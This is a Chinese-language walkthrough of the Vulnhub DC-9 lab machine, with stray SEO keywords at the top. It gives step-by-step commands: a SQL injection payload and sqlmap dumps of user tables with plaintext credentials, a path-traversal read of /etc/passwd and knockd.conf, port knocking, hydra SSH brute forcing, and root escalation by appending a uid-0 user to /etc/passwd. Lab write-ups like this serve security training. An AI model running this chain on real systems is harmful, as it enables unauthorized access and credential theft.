做网站视频手机,每太营销咨询,河南省住房城乡和建设厅网站,光之翼可以做网站吗目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载#xff1a; 官网地址#xff1a;https://… 目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载 官网地址https://download.vulnhub.com/dc/DC-9.zip 虚拟机VM虚拟机 或者VBOX 导入即可 网络环境NAT 介绍vulnhub是个提供各种漏洞平台的综合靶场拿到root权限才可以发现最终的flag。 二、信息收集 1、主机发现 nmap -sP 192.168.176.0/24 查看服务 nmap -A -p- -v 192.168.176.145 进入网站192.168.176.145 2、指纹识别 whatweb http://192.168.176.145/ 没有发现有用信息 三、漏洞复现 1、dirsearch目录探测 dirsearch -u http://192.168.176.145/ -e php -x 400,404,503,403 http://192.168.176.145/manage.php 后台地址 2、sqlmap注入测试 发现搜索页面存在SQL注入 payload1 or 11 # 现在直接使用sqlmap工具来进行SQL注入攻击 sqlmap -u http://192.168.176.145/results.php -data search1 -dbs sqlmap -u http://192.168.176.145/results.php -data search1 -D users -T UserDetails -C username,password -dump 跑出一些账号密码信息 保存一下 密码如下 | username | password |
--------------------------
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TCTheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |再跑另外一个看一下 sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T StaffDetails -dump sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T Users -C Password,Username -dump 856f5de590ef37314e7c3bdf6f8a66dc | admin 这里跑出一个admin账号密码是md5加密 也可以输入yes sqlmap自带的库碰撞 MD5免费在线解密破解_MD5在线加密-SOMD5 在线解密网站成功拿下 密码transorbital1 3、文件包含漏洞 看了半天只看到这个关键词 存在文件包含漏洞 http://192.168.176.145/manage.php/?file//../../../../etc/passwd 到这里 没思路了 上网看了一下思路 回头看 上面nmap扫描的这个22/tcp filtered ssh # 系统默认开放的但是通过策略关掉了因为被策略保护 处于关闭状态Knockd隐藏SSH 但是这里给出的用户密码信息 应该是可以 爆破一下ssh 4、Knockd敲门服务 4.1.利用LFI看看konckd的配置文件可以fuzz一下/etc 目录一般的配置文件都这个目录里。 payloadfile../../../../../etc/knockd.conf [options] UseSyslog [openSSH] sequence 7469,8475,9842 seq_timeout 25 command /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn [closeSSH] sequence 9842,8475,7469 seq_timeout 25 command /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn
找到了 特定的端口信息746984759842,按顺序敲敲门 4.2.nmap开启敲门 第一种方法 nmap -p 7469 192.168.176.145
nmap -p 8475 192.168.176.145
nmap -p 9842 192.168.176.145 第二种方法 for x in 7469 8475 9842; do nc 192.168.176.145 $x;done 4.3.现在重新nmap扫描服务看看 直接打开了 nmap -A -p- -v 192.168.176.145 5、ssh爆破 5.1.前面sqlmap跑的一个表 整理成字典 5.2.hy爆破 hydra -L username.txt mark -P pass.txt ssh://192.168.176.145 跑出了两个账户 login: joeyt password: Passw0rd login: janitor password: Ilovepeepee ssh joeyt192.168.176.145 -p 22 ssh连接 在janitor用户发现了一个隐藏的文件夹 cd .secrets-for-putin ls -a 存在一些密码写入密码字典继续爆破 之前没有出来的那些账号 5.3.ssh连接fredf login: fredf password: B4-Tru3-001 6、提权 接下来提权 查看有无sudo -l权限 sudo -l 发现fredf可以以root的身份执行 (root) NOPASSWD: /opt/devstuff/dist/test/test 是一个python文件 文件的意思是读取第一个文件追加到第二个文件上 利用find指令找到这个python文件 命令 find / -name test.py 2/dev/null 寻找叫做test.py的文件 接着在/opt/devstuff/发现python源文件test.py 代码如下 import sys
if len (sys.argv) ! 3 :print (Usage: python test.py read append)sys.exit (1)
else :f open(sys.argv[1], r)output (f.read())f open(sys.argv[2], a)f.write(output)f.close()这是一个可以写入文件的一个python程序,我们可以以root权限写入任意一个文件 所以我们接下来要以root权限在/etc/passwd中写入一个具有root权限的用户 因为在/etc/passwd中的密码都是加密过的我们也要设计一个加密的密码 设置密码命令 openssl passwd -1(md5加密算法) -salt用一个随机数去加盐 admin 123456 openssl passwd -1 -salt admin 123456 生成密码$1$admin$LClYcRe.ee8dQwgrFc5nz. 先把这些写入临时文件再用test.py读取文件追加到passwd里面 1、写入临时文件 echo admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:/root:/bin/bash /tmp/mm 2、python程序追加到etc/passwd sudo ./test /tmp/mm.txt /etc/passwd 3、切换用户看看 su admin 4、交互式shell python -c import pty;pty.spawn(/bin/bash) 四、提取flag
